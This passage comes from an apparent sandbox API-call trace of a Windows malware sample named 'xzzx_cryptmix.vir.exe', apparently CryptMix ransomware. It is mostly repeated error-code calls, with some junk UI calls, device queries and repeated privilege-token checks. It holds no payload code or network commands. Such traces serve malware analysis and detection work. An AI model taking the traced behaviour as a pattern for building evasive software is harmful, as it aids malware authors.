halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0016.711] GetLastError () returned 0x0 [0016.711] SetLastError (dwErrCode=0x0) [0016.711] GetLastError () returned 0x0 [0016.711] SetLastError (dwErrCode=0x0) [0016.711] GetLastError () returned 0x0 [0016.711] SetLastError (dwErrCode=0x0) [0016.711] GetLastError () returned 0x0 [0016.711] SetLastError (dwErrCode=0x0) [0016.711] GetLastError () returned 0x0 [0016.711] SetLastError (dwErrCode=0x0) [0016.711] GetLastError () returned 0x0 [0016.711] SetLastError (dwErrCode=0x0) [0016.711] GetLastError () returned 0x0 [0016.711] SetLastError (dwErrCode=0x0) [0016.711] GetLastError () returned 0x0 [0016.711] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.712] SetLastError (dwErrCode=0x0) [0016.712] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.713] SetLastError (dwErrCode=0x0) [0016.713] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.714] SetLastError (dwErrCode=0x0) [0016.714] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.715] GetLastError () returned 0x0 [0016.715] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.716] SetLastError (dwErrCode=0x0) [0016.716] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.717] GetLastError () returned 0x0 [0016.717] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.718] GetLastError () returned 0x0 [0016.718] SetLastError (dwErrCode=0x0) [0016.719] GetLastError () returned 0x0 [0016.719] SetLastError (dwErrCode=0x0) [0016.719] GetLastError () returned 0x0 [0016.719] SetLastError (dwErrCode=0x0) [0016.719] GetLastError () returned 0x0 [0016.719] SetLastError (dwErrCode=0x0) [0016.719] GetLastError () returned 0x0 [0016.719] SetLastError (dwErrCode=0x0) [0016.719] GetLastError () returned 0x0 [0016.719] SetLastError (dwErrCode=0x0) [0016.719] GetLastError () returned 0x0 [0016.719] SetLastError (dwErrCode=0x0) [0016.719] GetLastError () returned 0x0 [0016.719] SetLastError (dwErrCode=0x0) [0016.721] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0016.721] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0016.721] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x558339aa) returned 0x0 [0016.721] GetLastError () returned 0x0 [0016.721] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.722] SetLastError (dwErrCode=0x0) [0016.722] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.723] SetLastError (dwErrCode=0x0) [0016.723] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.724] SetLastError (dwErrCode=0x0) [0016.724] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.725] GetLastError () returned 0x0 [0016.725] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.726] GetLastError () returned 0x0 [0016.726] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.727] GetLastError () returned 0x0 [0016.727] SetLastError (dwErrCode=0x0) [0016.728] IsClipboardFormatAvailable (format=0x0) returned 0 [0016.729] IsDlgButtonChecked (hDlg=0x0, nIDButton=0) returned 0x0 [0016.729] InflateRect (in: lprc=0x18f7a8, dx=1, dy=1 | out: lprc=0x18f7a8) returned 1 [0016.729] GetFocus () returned 0x0 [0016.729] GetConsoleTitleA (in: lpConsoleTitle=0x181870, nSize=0x400 | out: lpConsoleTitle="") returned 0x0 [0016.729] GetLastError () returned 0x578 [0016.729] SetLastError (dwErrCode=0x578) [0016.729] UpdateWindow (hWnd=0x76f) returned 0 [0016.729] GetLastError () returned 0x578 [0016.729] CreateMenu () returned 0x4020f [0016.729] CreatePopupMenu () returned 0x60127 [0016.729] CreatePopupMenu () returned 0x20209 [0016.729] SetMenu (hWnd=0x0, hMenu=0x4020f) returned 0 [0016.729] SetCapture (hWnd=0x0) returned 0x0 [0016.730] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0016.746] OleLoadPicture () returned 0x80004003 [0016.746] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0016.753] QuerySecurityPackageInfoA (in: pszPackageName=0x0, ppPackageInfo=0x0 | out: ppPackageInfo=0x0) returned 0x80090305 [0016.786] GetCapture () returned 0x0 [0016.786] BeginPaint (in: hWnd=0x0, lpPaint=0x18eaf0 | out: lpPaint=0x18eaf0) returned 0x0 [0016.786] EndPaint (hWnd=0x0, lpPaint=0x18eaf0) returned 0 [0016.786] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0016.804] GetDeviceCaps (hdc=0x1, index=4) returned 0 [0016.804] GetDeviceCaps (hdc=0x1, index=6) returned 0 [0016.804] GetDeviceCaps (hdc=0x1, index=8) returned 0 [0016.804] GetDeviceCaps (hdc=0x1, index=10) returned 0 [0016.805] GetEnhMetaFileA (lpName="emf") returned 0x0 [0016.805] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x6c, lpEnhMetaHeader=0x18ecc8 | out: lpEnhMetaHeader=0x18ecc8) returned 0x0 [0016.805] PlayEnhMetaFile (hdc=0x0, hmf=0x0, lprect=0x18f7b8) returned 0 [0016.806] DeleteEnhMetaFile (hmf=0x0) returned 0 [0016.806] GetSystemMenu (hWnd=0x0, bRevert=0) returned 0x0 [0016.806] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0016.806] SetFocus (hWnd=0x0) returned 0x0 [0016.806] SetFocus (hWnd=0x0) returned 0x0 [0016.806] SetFocus (hWnd=0x0) returned 0x0 [0016.806] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.807] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] SetFocus (hWnd=0x0) returned 0x0 [0016.808] GetModuleHandleA (lpModuleName="kernel32") returned 0x76a20000 [0016.808] IsWindow (hWnd=0x0) returned 0 [0016.808] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xc, uEnable=0x0) returned 1 [0016.808] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0016.808] GetProcAddress (hModule=0x76a20000, lpProcName="HeapCreate") returned 0x76a34a2d [0016.809] SHGetMalloc (in: ppMalloc=0x18fe4c | out: ppMalloc=0x18fe4c*=0x753a66bc) returned 0x0 [0016.809] SHGetDesktopFolder (in: ppshf=0x18fe48 | out: ppshf=0x18fe48*=0x3119bc) returned 0x0 [0016.835] IShellFolder:ParseDisplayName (in: This=0x3119bc, hwnd=0x0, pbc=0x0, pszDisplayName="", pchEaten=0x18f4a4*=0xf000e, ppidl=0x18fe40, pdwAttributes=0x18f4b8*=0x90008 | out: pchEaten=0x18f4a4*=0xf000e, ppidl=0x18fe40, pdwAttributes=0x18f4b8*=0x90008) returned 0x0 [0016.835] IUnknown:Release (This=0x3119bc) returned 0x0 [0016.835] IUnknown:AddRef (This=0x753a66bc) returned 0x1 [0016.835] SendMessageA (hWnd=0x0, Msg=0xba, wParam=0x0, lParam=0x0) returned 0x0 [0016.835] SendMessageA (hWnd=0x0, Msg=0xc9, wParam=0xffffffff, lParam=0x0) returned 0x0 [0016.835] SendMessageA (hWnd=0x0, Msg=0xbb, wParam=0xffffffff, lParam=0x0) returned 0x0 [0016.835] SendMessageA (hWnd=0x0, Msg=0xb0, wParam=0x0, lParam=0x0) returned 0x0 [0016.835] SendDlgItemMessageA (hDlg=0x1, nIDDlgItem=-282440360, Msg=0x401, wParam=0x2, lParam=0x18f3ac) returned 0x0 [0016.835] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.836] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.836] GetLastError () returned 0x578 [0016.836] SetLastError (dwErrCode=0x578) [0016.836] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.836] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.836] GetCurrentThread () returned 0xfffffffe [0016.836] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.836] GetLastError () returned 0x3f0 [0016.836] GetCurrentProcess () returned 0xffffffff [0016.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.836] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.836] SetLastError (dwErrCode=0x522) [0016.836] CloseHandle (hObject=0x114) returned 1 [0016.837] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.837] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.837] GetLastError () returned 0x578 [0016.837] SetLastError (dwErrCode=0x578) [0016.837] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.837] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.837] GetCurrentThread () returned 0xfffffffe [0016.837] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.837] GetLastError () returned 0x3f0 [0016.837] GetCurrentProcess () returned 0xffffffff [0016.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.837] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.837] SetLastError (dwErrCode=0x522) [0016.837] CloseHandle (hObject=0x114) returned 1 [0016.837] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.837] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.837] GetLastError () returned 0x578 [0016.837] SetLastError (dwErrCode=0x578) [0016.837] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.837] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.837] GetCurrentThread () returned 0xfffffffe [0016.837] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.837] GetLastError () returned 0x3f0 [0016.837] GetCurrentProcess () returned 0xffffffff [0016.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.838] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.838] SetLastError (dwErrCode=0x522) [0016.838] CloseHandle (hObject=0x114) returned 1 [0016.838] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.838] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.838] GetLastError () returned 0x578 [0016.838] SetLastError (dwErrCode=0x578) [0016.838] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.838] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.838] GetCurrentThread () returned 0xfffffffe [0016.838] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.838] GetLastError () returned 0x3f0 [0016.838] GetCurrentProcess () returned 0xffffffff [0016.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.838] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.838] SetLastError (dwErrCode=0x522) [0016.838] CloseHandle (hObject=0x114) returned 1 [0016.838] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.838] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.838] GetLastError () returned 0x578 [0016.839] SetLastError (dwErrCode=0x578) [0016.839] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.839] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.839] GetCurrentThread () returned 0xfffffffe [0016.839] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.839] GetLastError () returned 0x3f0 [0016.839] GetCurrentProcess () returned 0xffffffff [0016.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.839] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.839] SetLastError (dwErrCode=0x522) [0016.839] CloseHandle (hObject=0x114) returned 1 [0016.839] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.839] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: 